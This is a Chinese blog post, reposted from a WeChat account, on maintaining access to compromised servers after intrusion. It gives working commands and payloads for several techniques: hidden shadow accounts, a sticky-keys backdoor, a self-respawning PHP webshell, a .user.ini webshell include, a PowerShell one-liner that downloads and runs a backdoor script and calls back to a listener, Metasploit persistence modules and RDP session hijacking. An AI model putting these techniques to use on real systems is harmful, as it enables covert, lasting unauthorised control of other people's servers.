后渗透之维护权限

简介

何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。常见的手段有,后门、影子账户、会话劫持等等。

实验

一、影子账户

原理:创建一个跟普通用户一样的用户,但是只能在注册表中才能查看到的用户。

net user username$ /add
net user

二、shift后门

原理:将按5下shift时调用的“粘滞键”替换为“CMD”
将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不    删除就会自动变回去
找到  C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe,放回文    件夹中
这次按5次shift键就可以打开cmd了

三、反弹加入自启(鸡肋)

1、NC反弹

2、Bash反弹

3、perl反弹

4、Python反弹

5、PHP反弹

6、等等

反弹代码参考这里 http://maikefee.com/archives/5d509f57.html

将反弹的脚本写入到启动项里,当受害者启动服务器时,自动反弹shell。弊端就是要一直监听,还要有公网的IP。

四、隐藏后门文件

1、将木马文件属性改为“隐藏”
2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。
3、利用循环不死马(举栗子)

<?php
    set_time_limit(0);
    ignore_user_abort(1);
    unlink(__FILE__);
    while(1){
    file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");
    $b=array_keys($a)[0];
    eval($b);?>');
    sleep(8);
    }
?>
  • 说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.

五、利用.user.ini文件自动包含木马文件

在“.user.ini”文件写入

auto_prepend_file=pic.gif

在”pic.gif”文件写入一句话木马

<!–?php $a = “a”.”s”.”s”.”e”.”r”.”t”;$a($_POST[“kk”]); ?–>

利用成功前提下必须有以下三个文件,

1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马

说明:在限制了PHP文件上传的条件下,上传ini文件,再进行文件包含拿shell.

六、Powershell权限维持

参考此PowerShell脚本

https://github.com/re4lity/Schtasks-Backdoor

利用代码:

powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"

说明:
1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。
2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell

七、metasploit权限维持

1、Persistence模块
前提是利用MSF获取到了对方的会话

run persistence -U -i 12 -p 6666 -r 192.168.124.14

说明

-i  目标自动回连时间
-p  设置目标反向连接的端口
-r  设置目标反向连接的ip地址
-U  设置目标自启动
加入自启动后,就算受害者机器再次启动也能弹回shell
2、metsvc 模块
前提是利用MSF获取到了对方的会话
run metsvc -A
说明:
-A 自动启动一个匹配的 multi/handler 以连接到该服务
该模块是在受害者服务器开启了一个“Meterpreter”服务
下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell
监听端口为31337

八、会话劫持

说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录

query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"
net start sesshijack

维护权限还有很多种方法,我这里只是举几个栗子.

公众号看到的,做个记录.

-------------本文结束❤感谢阅读-------------

本文标题:后渗透之维护权限

文章作者:MaiKeFee

发布时间:2019年09月09日

最后更新:2019年09月09日

原始链接:http://MaiKeFee.com/archives/b9ce30ce.html